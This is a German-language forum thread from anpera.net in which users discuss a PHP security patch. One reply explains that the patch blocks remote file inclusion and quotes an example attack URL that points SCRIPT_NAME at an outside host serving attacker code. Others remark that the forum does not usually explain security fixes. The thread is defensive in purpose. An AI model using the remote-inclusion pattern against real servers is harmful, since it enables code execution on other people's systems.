anpera.net

Ich wollte mal fragen was folgender Patch genau bewirkt:

$this->bbcode_second_pass_code('', '
if (substr($SCRIPT_NAME,strrpos($SCRIPT_NAME,".php"))!=".php" || strpos($PATH_INFO,".php")){
echo "Verarbeitung abgebrochen. Das Script ist ungueltig.";
')

Hier wird doch nur überprüft ob die angeforderte Datei die Endung .php hat. Ist dies nicht der Fall, würde doch weder die common.php eingebunden werden noch dieses codeschnippsel ausgeführt werden.

Ich vermute mal, dieser Code soll Seitenaufrufe wie diesen verhindern:
http://deinserver.de/source.php?SCRIPT_NAME=http://zombieserver.com/id.txt

Falls du deinen Server nun (bewusst oder fahrlässig) so konfiguriert hast, dass Code von extern ausgeführt werden kann, würde nun das ausgeführt werden was der Angreifer in id.txt geschrieben hat. Hier greift der erste Teil der Abfrage, der Scriptname endet nicht mehr mit .php

Nun könnte der Angreifer seine Datei umbenennen zu id.php
Jetzt greift der 2. Teil der Abfrage, im Pfadname, also vor dem letzten / kommt .php vor

In beiden Fällen würde "ungültiges Script" ausgegeben werden.

_________________
if(date("ymmd")=="10050502") echo("Der alte Sack wird heute 40");

mmmhmm... War es nicht mal so gehandhabt worden das in diesem forum die "Bugfixes / Patches" nicht extra erklärt werden da es leute gibt, die es vlt ausnutzen falls es doch mal jemand nicht gemacht hat o.ä. ?

kann auch sein das ich mich irre >_>

Das funktioniert? Gibts dazu ne Doku? Find nämlich nix ^^

ist so, daher werden sicherheitsfixe auch nur gepostet und anpera über die Hintergründe informiert

_________________
~Inaktiv und Abwesend solange Mysql hier Moderatorenrechte hat~

Gut dann bin ich ja doch noch nicht Senil >_>